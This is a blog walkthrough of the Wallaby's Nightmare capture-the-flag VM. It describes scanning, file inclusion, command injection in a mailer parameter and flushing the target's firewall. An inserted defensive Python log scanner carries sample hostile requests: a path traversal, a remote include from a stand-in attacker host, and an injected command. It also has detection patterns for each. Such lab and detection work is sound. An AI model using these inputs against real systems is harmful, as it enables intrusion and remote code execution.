Thursday, 12 January 2017

Wallaby's: Nightmare (1.0.2)


Today I want to present a Wallaby's: Nightmare (1.0.2) walkthrough.

Scanning phase

Good, we know that our target has been assigned the IP 192.168.56.100 or .101.
Let's try investigating .101 deeper using the nmap scanner with the -p- -sV options.

Great, the result provided us with very juicy information, such as open ports and the versions of the services hosted on them.

Let's begin our penetration test of the web application.

Interesting, isn't it? Let's try using a test username.

Our username is used in the application, hmmm. Clicking on "Start the CTF!" we are redirected to a certain page.

Nothing interesting? Let's look at the URL: we can use the page parameter to try LFI or RFI.

Bingo! This parameter is vulnerable to LFI! But unfortunately, after this action I got...

It's not an issue with my network connection :-( I am confused, so let's try using nmap again.

Wow! Port 80 is no longer open, but we can see that a new port has been opened: 60080! Let's investigate this port!

Looking for some useful URLs, I tried this URL address, which I already knew.

Bingo! There is also an LFI vulnerability here! Trying to read /etc/shadow, I got no result.
I spent a lot of time searching for a method or files that I would be able to display; I guessed the mailer file.

Interesting, let's look at the source code.

Hmmm, in the source code we can see that the mailer file has a mail parameter. Let's play with it.

Excellent! The mail parameter can execute bash commands!
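From the blue-team side, both weaknesses found so far (path traversal or remote includes in the page parameter, shell metacharacters in the mail parameter) leave clear traces in the web server's access log. The following Python snippet is an added example, not code from the original post or from the VM; the log lines it scans are constructed to mimic that traffic, and the parameter names are taken from the walkthrough.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the VM): one benign
# request, a traversal attempt, a remote-include attempt, and a
# command-injection attempt against the mailer's mail parameter.
SAMPLE_LOG = """\
192.168.56.1 - - [12/Jan/2017:10:01:02 +0000] "GET /?page=home HTTP/1.1" 200 512
192.168.56.1 - - [12/Jan/2017:10:01:09 +0000] "GET /?page=../../../../etc/passwd HTTP/1.1" 200 1834
192.168.56.1 - - [12/Jan/2017:10:04:31 +0000] "GET /?page=http://evil.example/shell.txt HTTP/1.1" 500 0
192.168.56.1 - - [12/Jan/2017:10:07:15 +0000] "GET /?page=mailer&mail=x%3Bid HTTP/1.1" 200 91
"""

# Pull the request target out of a combined-format log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Traversal, absolute system paths or a null byte in `page` (LFI).
LFI_RE = re.compile(r'(\.\./|\.\.\\|^/etc/|^/proc/|\x00)', re.IGNORECASE)
# Wrapper or remote scheme in `page` (RFI).
RFI_RE = re.compile(r'^(https?|ftp|php|data|expect)://', re.IGNORECASE)
# Shell metacharacters in `mail` (command injection).
CMDI_RE = re.compile(r'[;&|`$\n]')


def classify(line):
    """Return a list of finding tags for one access-log line (empty if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # parse_qs percent-decodes values, so x%3Bid arrives here as "x;id".
    query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    findings = []
    for value in query.get("page", []):
        if RFI_RE.search(value):
            findings.append("rfi:page")
        elif LFI_RE.search(value):
            findings.append("lfi:page")
    for value in query.get("mail", []):
        if CMDI_RE.search(value):
            findings.append("cmdi:mail")
    return findings


def scan_log(text):
    """Map each suspicious line number (1-based) to its findings."""
    hits = {}
    for number, line in enumerate(text.splitlines(), 1):
        findings = classify(line)
        if findings:
            hits[number] = findings
    return hits


if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG).items():
        print(number, findings)
```

The same rules work as a starting point for an alert in whatever log pipeline the server feeds, and the RFI check runs first so a remote URL is not double-counted as traversal.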

Great! We have a limited shell! Let's investigate what kind of privileges we have.

Good, we have full control over the firewall, so let's flush the rules.

OK, let's try to connect to the IRC server (port 6667), which was filtered before our action.
Now we are able to connect to the IRC.